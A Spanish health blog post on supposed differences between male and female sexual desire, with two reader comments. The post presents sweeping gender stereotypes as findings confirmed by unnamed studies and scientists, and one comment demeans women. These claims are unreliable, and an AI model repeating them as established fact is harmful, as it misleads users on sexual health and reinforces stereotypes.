Salud y belleza » Salud, Salud sexual

Diferencias entre el deseo sexual masculino y femenino

2 Comentarios

deseo-mujeresA la hora de hablar de deseo sexual en muchas ocasiones generalizamos, pero es un error ya que las mujeres y los hombres experimentan ese deseo de distinta forma. Algunos estudios muestran que la libido de las mujeres es menos directa y más difícil de identificar. Sin embargo, los hombres tienen un deseo sexual mucho más directo habitualmente, por decirlo de algún modo.

Algunos psicólogos sociales han comprobado que los hombres se excitan más espontáneamente y tienen más fantasías sexuales que ellas. Ellas también se ven atraídas por los hombres, pero necesitan algo más para que se despierte su libido y sus placeres no se basan únicamente en la cama. Es decir, las mujeres tienen que tener algún tipo de conexión emocional para tener relaciones, aunque también hay excepciones en cada caso.

¿Entonces los hombres tienen un deseo sexual más fuerte que las mujeres? Muchos estudios lo corroboran, y además aseguran que es mucho más directo, mientras que el deseo sexual femenino está más influenciado por sentimiento y factores culturales y sociales (se podría decir que es algo más complejo). Existen algunas teorías sobre el deseo sexual en hombres y mujeres que nos encargaremos de explicar.

Se dice que los hombres piensan más en sexo y lo buscan con más frecuencias, y una investigación de la Universidad de Chicago que ha estudiado los patrones sexuales masculinos confirma que la mayoría de ellos piensan en el sexo al menos una vez al día mientras que solo una de cada cuatro mujeres presenta esta tendencia. Por eso los hombres quieren más sexo, con más compañeras y están más dispuestos a pagar por él que ellas, además se masturban con mucha más frecuencia según este estudio.

libido-hombres-mujeres

Por otro lado, las investigaciones científicas también han demostrado que el camino para llegar a la satisfacción sexual es diferente para hombres que para mujeres. Ellas quieren que las seduzcan y ellos ser los grandes seductores o bien por su físico o bien por la labia. Ellas necesitan que haya un contexto, un trama, un romance, un misterio… Para ellos el sexo es más la conexión, aunque también tienen emociones, pero son emociones diferentes, otro lenguaje.

Además, los científicos aseguran que las mujeres se ven más influenciadas por factores culturales y sociales. Las más religiosas y las que tienen menos estudios suelen ser más conservadoras a la hora del sexo. Sin embargo, las que tienen un alto nivel educativo suelen ser más arriesgadas y liberales.

Las investigaciones demuestran que el deseo sexual es diferente en función del género, pero no todo el mundo pensará igual.

¿Estás de acuerdo con todas estas teorías?

var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , , ,

2 Comments »

  • cleo said:

    totalmente de acuerdo. Las mujeres buscamos algo más sentimental y sensual. los hombres solo piensan en sexo.

  • Edu said:

    Creo que los hombres buscamos mas el sexo, es por cuestiones de supervivencia, porque si el hombre no coge la iniciativa no habrá mujeres que se le va a ofrecer nunca, o si alguna lo haces es porque esta borracha o es muy fea y se siente muy sola.

    A lo largo de los años hemos aprendido a que tenemos que dar el paso, ellas cuando quieren el sexo es mas fácil solo con hacer un paso o una mirada y ya lo tienen.. en esto desde luego influye nuestra educación y la cultura.

    eso es cierto los hombres también valoramos un sexo diferente con emociones y con mas implicaciones, misterio o que haya detrás una historia muy bonita

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.